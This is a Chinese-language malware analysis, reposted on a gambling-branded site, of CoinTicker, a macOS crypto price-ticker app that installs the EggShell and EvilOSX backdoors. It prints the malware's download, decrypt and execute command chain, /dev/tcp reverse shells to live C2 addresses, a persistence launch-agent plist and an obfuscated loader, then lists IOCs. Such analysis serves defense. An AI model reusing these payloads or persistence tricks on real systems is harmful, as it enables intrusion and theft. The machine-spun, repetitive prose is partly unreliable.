Mac上的加密钱银价格寻找运用CoinTicker后门分析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

Mac上的加密钱银价格寻找运用CoinTicker后门分析

申博_新闻事件 申博 357次浏览 已收录 0个评论

前言

我们论坛的贡献者弗拉基米尔在论坛上看到一个名叫CoinTicker的运用顺序在周末表现出一些可疑行动。这款运用好像不只秘密地装置了一个后门,并且还装置了两个分歧的后门。

行动分析

从表面上看,CoinTicker运用顺序好像是一个正当的运用顺序,能够对投资加密泉币的人有效。下载后,该运用顺序会在菜单栏显现一个图标,显现以后比特币价钱的信息。 Mac上的加密钱银价格寻找运用CoinTicker后门分析运用顺序的首选项许可用户自定义显现有关种种加密泉币的信息,包孕比特币,Etherium和Monero。 Mac上的加密钱银价格寻找运用CoinTicker后门分析固然这个功用好像是正当的,然则运用顺序背景干甚么用户不知道。但是,在推出时,运用顺序会下载并装置两个分歧的开源后门组件:EvilOSX和EggShell。该运用顺序实行以下shell敕令以下载用于macOS的自定义编译的EggShell服务器版本:

Mac上的加密钱银价格寻找运用CoinTicker后门分析运用顺序的首选项许可用户自定义显现有关种种加密泉币的信息,包孕比特币,Etherium和Monero。
Mac上的加密钱银价格寻找运用CoinTicker后门分析固然这个功用好像是正当的,然则运用顺序背景干甚么用户不知道。但是,在推出时,运用顺序会下载并装置两个分歧的开源后门组件:EvilOSX和EggShell。该运用顺序实行以下shell敕令以下载用于macOS的自定义编译的EggShell服务器版本:

nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py

该敕令的第一局部从属于名为“youarenick”的用户的Github页面下载编码文件,并将该文件保存到/ private/tmp/中名为.info.enc的隐蔽文件中。接下来,它运用openssl将该文件解码为名为.info.py的隐蔽Python文件。最初,它实行天生的Python剧本。该.info.py剧本实行多个义务。起首,它运用以下敕令翻开与cc服务器的反向shell衔接:

nohup bash&> /dev/tcp/94.156.189.77/2280 0>&1(域seednode3.parsicoin.net剖析为此IP地点。)

接下来,它下载EggShell mach-o二进制文件,将其保存到/tmp/espl:

curl -k -L -o / tmp / espl https://github.com/youarenick/newProject/raw/master/mac

最初,它在/tmp/.server.sh建立并运转shell剧本,该剧本还建立了反向shell。

#!/ bin / bash 
nohup bash&> /dev/tcp/94.156.189.77/2280 0>&1

CoinTicker运用顺序还会建立一个名为.espl.plist的用户启动署理顺序,它按期运转相反的敕令:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>AbandonProcessGroup</key>
  <true/>
  <key>Label</key>
  <string>com.apple.espl</string>
  <key>ProgramArguments</key>
  <array>
    <string>sh</string>
    <string>-c</string>
    <string>nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
  <key>StartInterval</key>
  <integer>90</integer>
</dict>
</plist>

这好像致使espl二进制文件被屡次启动,那确实是这类状况。
Mac上的加密钱银价格寻找运用CoinTicker后门分析该软件还在用户的Containers文件夹中建立了一个名为.UpQZdhkKfCdSYxg的文件夹,该文件夹是名为  plQqVfeJvGo的Python剧本(我们以为这些名称是随机的,但遗憾的是CoinTicker运用顺序已住手运转,因而我们没法确认。)此剧本经由编码以隐蔽内容:

Mac上的加密钱银价格寻找运用CoinTicker后门分析该软件还在用户的Containers文件夹中建立了一个名为.UpQZdhkKfCdSYxg的文件夹,该文件夹是名为  plQqVfeJvGo的Python剧本(我们以为这些名称是随机的,但遗憾的是CoinTicker运用顺序已住手运转,因而我们没法确认。)此剧本经由编码以隐蔽内容:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import getpass
import uuid
def get_uid():
return "".join(x.encode("hex") for x in (getpass.getuser() + "-" + str(uuid.getnode())))
exec("".join(os.popen("echo 'U2FsdGVkX19GsbCj4lq2hzo27vqseHTtKbNTx9
...
TjO1GlH1+7cP7pDYa8ykBquk4WhU0/UqE' | openssl aes-256-cbc -A -d -a -k %s -md md5" % get_uid()).readlines()))

提取剧本能够发明它就是来自Github用户Marten4n6制造的EvilOSX后门。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Minimal bot which loads modules as they are needed from the server."""
__author__ = "Marten4n6"
__license__ = "GPLv3"
__version__ = "4.1.1"
...

这个剧本是定制的,能够使后门在端口1339上与服务器185.206.144.226通讯。该歹意软件还建立了一个名为com.apple.EOFHXpQvqhr.plist的用户启动署理,用于连结此剧本运转。

影响

固然还不清晰这个歹意软件背地的黑客究竟想要到达甚么目标,然则EggShell和EvilOSX都是能够用于种种目标后门。但是,因为歹意软件是经由过程加密泉币运用顺序分发的,因而该歹意软件好像是为了猎取用户加密泉币钱包的接见权,从而盗取硬币。早先,这看起来多是一个供应链的进击,但是,在进一步的搜检中,看起来这个运用顺序能够从一最先就不正当。起首,这款运用经由过程一个名为coin-sticker.com的域名宣布。这和app的名字很靠近,但又不完全一样。

IOC

 建立的文件:

/private/tmp/.info.enc
/private/tmp/.info.py
/private/tmp/.server.sh
/private/tmp/espl
~/Library/LaunchAgents/.espl.plist
~/Library/LaunchAgents/com.apple.[random string].plist
~/Library/Containers/.[random string]/[random string]

网络衔接:

94.156.189.77:2280
185.206.144.226:1339

SHA-256:

CoinTicker.zip f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4
espl efb5b32f87bfd6089912073cb33850c58640d59cb52d8c63853d97b4771bc490

申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明Mac上的加密钱银价格寻找运用CoinTicker后门分析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址